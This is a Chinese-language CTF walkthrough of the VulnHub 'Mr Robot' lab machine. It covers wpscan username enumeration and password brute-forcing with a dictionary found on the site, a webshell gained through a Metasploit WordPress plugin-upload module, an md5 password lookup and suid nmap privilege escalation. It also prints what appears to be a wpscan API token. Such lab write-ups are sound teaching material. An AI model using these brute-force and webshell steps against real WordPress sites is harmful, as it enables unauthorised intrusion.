一个 ctf 类的靶机 https://www.vulnhub.com/entry/mr-robot-1,151/

信息收集

12. Mr robot 靶机

sS sT 都扫了全端口、sU 扫了 top 1k 端口。有效的就这些。

web 端口

第一眼看上去非常惊艳,看起来及其酷炫。

浏览网页功能。跑目录。跑爬虫。送到 burp crawl 尝试爬取一些信息。

12. Mr robot 靶机

发现一个 名为 fsocity.dic 的字典,长达 80w 行,太多了,尝试去重,只剩 1w 多行。

发现 wp 网站,果断上 wpscan

# 先跑插件,主题,小范围 id 用户
wpscan --url=http://192.168.200.150 -e vp,vt,u1-50 --api-token PZZl9BlyoGuWqg8OL9DZRs9fsytsCKs7V3mRlnUeaTA
# 没法现值得注意的。

# 发现 /wp-login.php 登录页面存在用户名枚举,尝试用前面获取到的字典跑用户
wpscan --url=http://192.168.200.150 -e u --users-list ../../ztest/uniqueusername --detection-mode passive --users-detection mixed
# 发现三个有效用户名  elliot:Elliot:ELLIOT

# 进一步用这个字典充当密码,尝试跑一下
wpscan --url=http://192.168.200.150 -e u -U Elliot,elliot,ELLIOT -P ../../ztest/uniqueusername --detection-mode passive --users-detection mixed 
# 发现三个用户凭证相同,都是 ER28-0652

成功获取管理员后台。

12. Mr robot 靶机

上传插件即可获取 webshell 。

此处我选择使用的是 msf 自带的 plugin 上传模块。但需要修改下检测模块。

ll /usr/share/metasploit-framework/modules/exploits/unix/webapp/wp_admin_shell_upload.rb

12. Mr robot 靶机

$ grep "def wordpress_and_online" -r /usr/share/metasploit-framework/*
/usr/share/metasploit-framework/lib/msf/core/exploit/remote/http/wordpress/base.rb:  def wordpress_and_online?

12. Mr robot 靶机

可以看到判断是否为wordpress 主要是正则匹配 wordpress 特有的关键词。而主页的没有包含这些关键词,故匹配失败。解决方法注释即可。

这个解决方法只是临时解决方法,,

得到 shell 。

提权

查看其它用户目录,发现 robot 用户目录下的第二个key ,并且其给出了密码的md5 ,网上搜索即可得到其对应的密码abcdefghijklmnopqrstuvwxyz。然后以 robot 用户登录,获取到第二个 key。

12. Mr robot 靶机

上传 linpeas 脚本,收集到以下信息。

Linux version 3.13.0-55-generic (buildd@brownie) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #94-Ubuntu SMP 
Description:    Ubuntu 14.04.2 LTS

12. Mr robot 靶机

集成安装包的点,无太大利用价值

12. Mr robot 靶机

12. Mr robot 靶机

12. Mr robot 靶机

12. Mr robot 靶机

suid 提权

发现 suid 的nmap ,正好可以通过其提权。

12. Mr robot 靶机

12. Mr robot 靶机

12. Mr robot 靶机

第三个 key

相关文章: